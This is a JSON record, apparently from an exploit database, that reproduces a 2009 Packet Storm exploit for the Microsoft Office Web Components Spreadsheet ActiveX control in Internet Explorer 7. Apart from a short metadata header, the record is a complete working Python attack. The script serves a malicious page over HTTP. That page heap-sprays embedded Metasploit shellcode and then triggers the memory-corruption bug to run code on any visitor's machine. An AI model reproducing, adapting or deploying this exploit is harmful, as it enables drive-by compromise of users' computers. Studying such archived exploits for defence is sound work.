{"id": "PACKETSTORM:79463", "type": "packetstorm", "bulletinFamily": "exploit", "title": "Microsoft Office Web Active-X Exploit", "description": "", "published": "2009-07-21T00:00:00", "modified": "2009-07-21T00:00:00", "cvss": {"vector": "NONE", "score": 0.0}, "href": "https://packetstormsecurity.com/files/79463/Microsoft-Office-Web-Active-X-Exploit.html", "reporter": "Ahmed Obied", "references": [], "cvelist": [], "lastseen": "2016-11-03T10:26:48", "viewCount": 12, "enchantments": {"score": {"value": -0.5, "vector": "NONE"}, "dependencies": {}, "backreferences": {}, "exploitation": null, "vulnersScore": -0.5}, "sourceHref": "https://packetstormsecurity.com/files/download/79463/msofficeweb-activex.txt", "sourceData": "`# \n# Author : Ahmed Obied (ahmed.obied@gmail.com) \n# \n# - Based on the code posted at http://www.milw0rm.com/exploits/9163 \n# - Tested using: \n# > Internet Explorer 7.0.5730.13 on Windows XP SP3 with owc10.dll installed \n# > Internet Explorer 7.0.5730.13 on Windows XP SP3 with owc11.dll installed \n# \n# Usage : python ie_owc.py [port (between 1024 and 65535)] \n# \n \nimport sys \nimport socket \n \nfrom BaseHTTPServer import HTTPServer, BaseHTTPRequestHandler \n \nclass RequestHandler(BaseHTTPRequestHandler): \n \ndef convert_to_utf16(self, payload): \n# From Beta v2.0 by Berend-Jan Wever \n# http://www.milw0rm.com/exploits/656 \nenc_payload = '' \nfor i in range(0, len(payload), 2): \nnum = 0 \nfor j in range(0, 2): \nnum += (ord(payload[i + j]) & 0xff) << (j * 8) \nenc_payload += '%%u%04x' % num \nreturn enc_payload \n \ndef get_payload(self): \n# win32_exec - EXITFUNC=process CMD=calc.exe Size=164 Encoder=PexFnstenvSub \n# http://metasploit.com \npayload = '\\x31\\xc9\\x83\\xe9\\xdd\\xd9\\xee\\xd9\\x74\\x24\\xf4\\x5b\\x81\\x73' \npayload += '\\x13\\x6f\\x02\\xb1\\x0e\\x83\\xeb\\xfc\\xe2\\xf4\\x93\\xea\\xf5\\x0e' \npayload += '\\x6f\\x02\\x3a\\x4b\\x53\\x89\\xcd\\x0b\\x17\\x03\\x5e\\x85\\x20\\x1a' \npayload += '\\x3a\\x51\\x4f\\x03\\x5a\\x47\\xe4\\x36\\x3a\\x0f\\x81\\x33\\x71\\x97' \npayload += '\\xc3\\x86\\x71\\x7a\\x68\\xc3\\x7b\\x03\\x6e\\xc0\\x5a\\xfa\\x54\\x56' \npayload += '\\x95\\x0a\\x1a\\xe7\\x3a\\x51\\x4b\\x03\\x5a\\x68\\xe4\\x0e\\xfa\\x85' \npayload += '\\x30\\x1e\\xb0\\xe5\\xe4\\x1e\\x3a\\x0f\\x84\\x8b\\xed\\x2a\\x6b\\xc1' \npayload += '\\x80\\xce\\x0b\\x89\\xf1\\x3e\\xea\\xc2\\xc9\\x02\\xe4\\x42\\xbd\\x85' \npayload += '\\x1f\\x1e\\x1c\\x85\\x07\\x0a\\x5a\\x07\\xe4\\x82\\x01\\x0e\\x6f\\x02' \npayload += '\\x3a\\x66\\x53\\x5d\\x80\\xf8\\x0f\\x54\\x38\\xf6\\xec\\xc2\\xca\\x5e' \npayload += '\\x07\\x7c\\x69\\xec\\x1c\\x6a\\x29\\xf0\\xe5\\x0c\\xe6\\xf1\\x88\\x61' \npayload += '\\xd0\\x62\\x0c\\x2c\\xd4\\x76\\x0a\\x02\\xb1\\x0e' \nreturn self.convert_to_utf16(payload) \n \ndef get_exploit(self): \nexploit = ''' \n \nfunction spray_heap() \n{ \nvar chunk_size, payload, nopsled; \n \nchunk_size = 0x100000; \npayload = unescape(\"<PAYLOAD>\"); \nnopsled = unescape(\"<NOP>\"); \nwhile (nopsled.length < chunk_size) \nnopsled += nopsled; \nnopsled_len = chunk_size - (payload.length + 20); \nnopsled = nopsled.substring(0, nopsled_len); \nheap_chunks = new Array(); \nfor (var i = 0 ; i < <CHUNKS> ; i++) \nheap_chunks[i] = nopsled + payload; \n} \n \nfunction trigger_bug() \n{ \nvar obj, arr; \n \ntry { \nobj = new ActiveXObject(\"OWC10.Spreadsheet\"); \n} catch (err) { \ntry { \nobj = new ActiveXObject(\"OWC11.Spreadsheet\"); \n} catch (err) { \nwindow.location = 'about:blank'; \n} \n} \narr = new Array(); \narr.push(1); \narr.push(2); \narr.push(0); \narr.push(window); \nfor (var i = 0 ; i < arr.length ; i++) { \nfor (var j = 0 ; j < 10 ; j++) { \ntry { \nobj.Evaluate(arr[i]); \n} catch (err) {} \n} \n} \nwindow.status = arr[3] + \"\"; \nfor (var j = 0 ; j < 10 ; j++) { \ntry { \nobj.msDataSource(arr[3]); \n} catch (err) {} \n} \n} \n \nspray_heap(); \ntrigger_bug(); \n \n''' \nexploit = exploit.replace('<PAYLOAD>', self.get_payload()) \nexploit = exploit.replace('<NOP>', '%u0b0c%u0b0c') \nexploit = exploit.replace('<CHUNKS>', '100') \nexploit = '<html><body><script>' + exploit + '</script></body></html>' \nreturn exploit \n \ndef log_request(self, *args, **kwargs): \npass \n \ndef do_GET(self): \ntry: \nif self.path == '/': \nprint \nprint '[-] Incoming connection from %s' % self.client_address[0] \nself.send_response(200) \nself.send_header('Content-Type', 'text/html') \nself.end_headers() \nprint '[-] Sending exploit to %s ...' % self.client_address[0] \nself.wfile.write(self.get_exploit()) \nprint '[-] Exploit sent to %s' % self.client_address[0] \nexcept: \nprint '[*] Error : an error has occured while serving the HTTP request' \nexit_program() \n \ndef exit_program(): \nprint '[-] Exiting ...' \nsys.exit(0) \n \ndef main(): \nif len(sys.argv) != 2: \nprint 'Usage: %s [port (between 1024 and 65535)]' % sys.argv[0] \nsys.exit(0) \ntry: \nport = int(sys.argv[1]) \nif port < 1024 or port > 65535: \nraise ValueError \ntry: \nserv = HTTPServer(('', port), RequestHandler) \nip = socket.gethostbyname(socket.gethostname()) \nprint '[-] Web server is running at http://%s:%d/' % (ip, port) \ntry: \nserv.serve_forever() \nexcept: \nexit_program() \nexcept socket.error: \nprint '[*] Error : a socket error has occurred' \nexit_program() \nexcept ValueError: \nprint '[*] Error : an invalid port number was given' \nexit_program() \n \nif __name__ == '__main__': \nmain() \n \n`\n", "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1647519872, "score": 1659770509}}
{}